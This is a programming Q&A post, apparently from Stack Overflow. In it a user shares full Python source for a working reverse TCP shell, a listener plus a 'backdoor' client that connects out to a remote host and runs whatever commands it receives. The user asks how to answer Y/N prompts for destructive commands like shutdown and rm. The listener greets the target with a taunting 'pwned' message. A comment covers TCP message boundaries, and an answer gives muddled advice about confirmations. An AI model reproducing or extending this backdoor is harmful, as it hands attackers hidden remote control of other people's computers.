# How to continue a command in a reverse shell?

Tags: python, sockets, tcp, subprocess

I built a simple reverse TCP shell in python and it works fine, except when I try to run a command that requires a confirmer such as "Y" or "N", like shutdown or rm. I cant input the "Y" or "N" as it treats it as a seperate command, rather than a follow-up to the last command, if that makes sense

Here is the code for the listener:

```
#Server side

import socket

host = "0.0.0.0"
port = 9999
buffer = 10240
s = socket.socket()

s.bind((host, port))
s.listen(5)
print(f"Listening as {host}:{port}...")
client_socket, client_address = s.accept()

print(f"{client_address[0]}:{client_address[1]} Connected!")
message = "You have been pwned by Mackenzie Blackaby... Enjoy your dead computer".encode()
client_socket.send(message)

while True:
    command = input("Enter the command to pwn your opponent: ")
    client_socket.send(command.encode())
    if command.lower() == "exit":
        break
    results = client_socket.recv(buffer).decode()
    print(results)
client_socket.close()
s.close()
```

And here is the code for the backdoor:

```
#Client side

import socket
import subprocess

host = "My public IP, removed for privacy due to port forwarding"
port = 9999
buffer = 10240

s = socket.socket()
s.connect((host, port))
message = s.recv(buffer).decode()
print(message)

while True:
    command = s.recv(buffer).decode()
    if command.lower() == "exit":
        break
    output = subprocess.getoutput(command)
    s.send(output.encode())
s.close
```

Comment: First of all, your code makes the common mistake of assuming that SOCK_STREAM obeys message boundaries. It does not, so the fact that your code works at all is just lucky. So you need a protocol to run on top of SOCK_STREAM. That protocol should include information about whether the command is waiting for more input or is finished.

Answer (score 0):

- So you want a confirmer for your tasks right?
- You can create a confirmer by using if else immediately after taking your initial input and before sending the message to the server.
- Check for 'Y' or yes and send the message, else send some other message or prompt the user to send a different image and take input again.(It is important to send some or the other message as it is a **half duplex system**).